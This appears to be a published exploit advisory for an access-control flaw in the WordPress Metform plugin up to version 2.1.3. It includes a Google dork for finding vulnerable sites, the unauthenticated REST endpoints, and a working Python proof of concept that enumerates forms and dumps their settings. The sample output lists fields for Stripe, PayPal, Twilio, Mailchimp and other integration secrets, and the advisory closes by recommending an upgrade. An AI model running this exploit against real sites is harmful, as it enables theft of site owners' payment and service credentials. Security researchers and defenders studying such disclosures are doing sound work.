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WordPress Plugin Metform <= 2.1.3 - Improper Access Control Allowing Unauthenticated Sensitive Information Disclosure

WordPress Plugin Metform <= 2.1.3 - Improper Access Control Allowing Unauthenticated Sensitive Information Disclosure

Exploit TitleWordPress Plugin Metform <= 2.1.3 - Improper Access Control Allowing Unauthenticated Sensitive Information Disclosure
Exploit AuthorMuhammad Zeeshan (Xib3rR4dAr)
DateApril 11, 2022
Plugin LinkMetform Elementor Contact Form Builder
Plugin Active Installations100,000+
Version2.1.3 (latest version at time of vulnerability discovery)
Tested onWordpress 5.9.3
Vulnerable Endpoint/wp-json/metform/v1/forms/get/{form_id_here}
Vulnerable File/wp-content/plugins/metform/core/forms/action.php#L185
Unauthenticatedly Disclosed InformationAll configured API keys/secrets of 3rd party integrations like that of PayPal, Stripe, Mailchimp, Hubspot, HelpScout, reCAPTCHA and many more
Google Dorkintext:parent.decodeEntities OR inurl:/wp-content/plugins/metform


Metform contact form builder is an addon for elementor used to build any contact form on the fly with Metform drag and drop builder. It can manage multiple contact forms and one can customize the form with an elementor builder. Metform can be integrated with various third-party APIs.



API keys and secrets of third-part integrations can be added and viewed by Wordpress admins.

Vulnerability: The Metform WordPress plugin is vulnerable to sensitive information disclosure due to improper access control in the ~/core/forms/action.php file which can be exploited by an unauthenticated attacker to view all API keys and secrets of integrated third-party APIs like that of PayPal, Stripe, Mailchimp, Hubspot, HelpScout, reCAPTCHA and many more, in versions up to and including 2.1.3.

Vulnerable Endpoint: /wp-json/metform/v1/forms/get/{form_id_here}

Reproduction Steps

  • On wordpress installation, where Metform's version <= 2.1.3 is running, send a GET request to:

It will list all form ids and their titles

  • Pick any existent form id and send GET request to following replacing {form_id_here} with numeric form id received from previous step

It will list all the juicy stuff.

Vulnerable Code

/wp-content/plugins/metform/core/forms/action.php#L185 Vulnerable Method: get_all_data

	public function get_all_data($post_id) {

		$post = get_post($post_id);
		return $all_settings;


Proof of Concept

import requests, json
from bs4 import BeautifulSoup
import urllib3

# Uncomment to use proxy
proxyDict = { 
    #"http": "",
    #"https": ""

wpurl               =   input('\nWordPress URL: ')
exploit1            =   f'/wp-json/metform/v1/forms/templates/0'
exploit1_url        =   wpurl+exploit1

headers             =   {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15"}

resp_templates      =   requests.get(exploit1_url, headers=headers, proxies=proxyDict, verify=False)

soup                =   BeautifulSoup(resp_templates.text, features="lxml")

for option in soup.find_all('option'):
	print (f"\nForm ID: {option['value']}, Form Title: {option.text}")
	exploit2        =   f"/wp-json/metform/v1/forms/get/{option['value']}"
	exploit2_url    =   wpurl+exploit2
	resp_forms      =   requests.get(exploit2_url, headers=headers, proxies=proxyDict, verify=False)
	if resp_forms.text:
		data        =   resp_forms.json()
		print(json.dumps(data, sort_keys=True, indent=4))

Sample Output/Value of keys disclosed:

λ python

WordPress URL:

Form ID: 123, Form Title: SomeFormTitle
    "admin_email_attach_submission_copy": "",
    "admin_email_body": "",
    "admin_email_from": "",
    "admin_email_reply_to": "",
    "admin_email_subject": "",
    "admin_email_to": "",
    "aweber_opt": [],
    "capture_user_browser_data": "",
    "ckit_opt": [],
    "count_views": "",
    "email_verification_confirm_redirect": "",
    "email_verification_email_subject": "",
    "email_verification_enable": "",
    "email_verification_heading": "",
    "email_verification_paragraph": "",
    "enable_admin_notification": "",
    "enable_recaptcha": "",
    "enable_user_notification": "",
    "entry_title": "",
    "failed_cancel_url": "",
    "form_title": "",
    "hide_form_after_submission": "",
    "input_names": "",
    "limit_total_entries": "",
    "limit_total_entries_status": "",
    "mf_active_campaign": "",
    "mf_active_campaign_api_key": "",
    "mf_active_campaign_list_id": "",
    "mf_active_campaign_tag_id": "",
    "mf_active_campaign_url": "",
    "mf_automizy": "",
    "mf_automizy_api_token": "",
    "mf_automizy_list_id": "",
    "mf_aweber_dev_api_key": "",
    "mf_aweber_dev_api_sec": "",
    "mf_aweber_list_id": "",
    "mf_ckit_api_key": "",
    "mf_ckit_list_id": "",
    "mf_ckit_sec_key": "",
    "mf_convert_kit": "",
    "mf_fluent": "",
    "mf_fluent_webhook": "",
    "mf_form_to_post": "",
    "mf_get_reponse_api_key": "",
    "mf_get_response": "",
    "mf_get_response_list_id": "",
    "mf_google_map_api_key": "",
    "mf_google_sheet": "",
    "mf_google_sheet_client_id": "",
    "mf_google_sheet_client_secret": "",
    "mf_helpscout": "",
    "mf_helpscout_app_id": "",
    "mf_helpscout_app_secret": "",
    "mf_helpscout_conversation_customer_email": "",
    "mf_helpscout_conversation_customer_first_name": "",
    "mf_helpscout_conversation_customer_last_name": "",
    "mf_helpscout_conversation_customer_message": "",
    "mf_helpscout_conversation_subject": "",
    "mf_helpscout_mailbox": "",
    "mf_helpscout_token": "",
    "mf_hubsopt_token": "",
    "mf_hubspot": "",
    "mf_hubspot_form_guid": "",
    "mf_hubspot_form_portalId": "",
    "mf_hubspot_forms": "",
    "mf_login": "",
    "mf_mail_aweber": "",
    "mf_mail_chimp": "",
    "mf_mail_poet": "",
    "mf_mail_poet_list_id": "",
    "mf_mailchimp_api_key": "",
    "mf_mailchimp_list_id": "",
    "mf_mailster": "",
    "mf_mailster_fields": "",
    "mf_mailster_list_id": "",
    "mf_payment_currency": "",
    "mf_paypal": "",
    "mf_paypal_email": "",
    "mf_paypal_sandbox": "",
    "mf_paypal_token": "",
    "mf_post_submission_author": "",
    "mf_post_submission_content": "",
    "mf_post_submission_featured_image": "",
    "mf_post_submission_post_type": "",
    "mf_post_submission_title": "",
    "mf_recaptcha": "",
    "mf_recaptcha_secret_key": "",
    "mf_recaptcha_secret_key_v3": "",
    "mf_recaptcha_site_key": "",
    "mf_recaptcha_site_key_v3": "",
    "mf_recaptcha_version": "",
    "mf_registration": "",
    "mf_rest_api": "",
    "mf_rest_api_method": "",
    "mf_rest_api_url": "",
    "mf_slack": "",
    "mf_slack_webhook": "",
    "mf_sms_admin_body": "",
    "mf_sms_admin_status": "",
    "mf_sms_admin_to": "",
    "mf_sms_from": "",
    "mf_sms_status": "",
    "mf_sms_twilio_account_sid": "",
    "mf_sms_twilio_auth_token": "",
    "mf_sms_user_body": "",
    "mf_sms_user_status": "",
    "mf_stop_vertical_scrolling": "",
    "mf_stripe": "",
    "mf_stripe_image_url": "",
    "mf_stripe_live_publishiable_key": "",
    "mf_stripe_live_secret_key": "",
    "mf_stripe_sandbox": "",
    "mf_stripe_test_publishiable_key": "",
    "mf_stripe_test_secret_key": "",
    "mf_thank_you_page": "",
    "mf_zapier": "",
    "mf_zapier_webhook": "",
    "mf_zoho": "",
    "mf_zoho_token": "",
    "mp_opt": [],
    "multiple_submission": "",
    "redirect_to": "",
    "require_login": "",
    "store_entries": "1",
    "success_message": "",
    "success_url": "",
    "user_email_attach_submission_copy": "",
    "user_email_body": "",
    "user_email_from": "",
    "user_email_reply_to": "",
    "user_email_subject": ""


  • Update Metform plugin to version 2.1.4, or newer.
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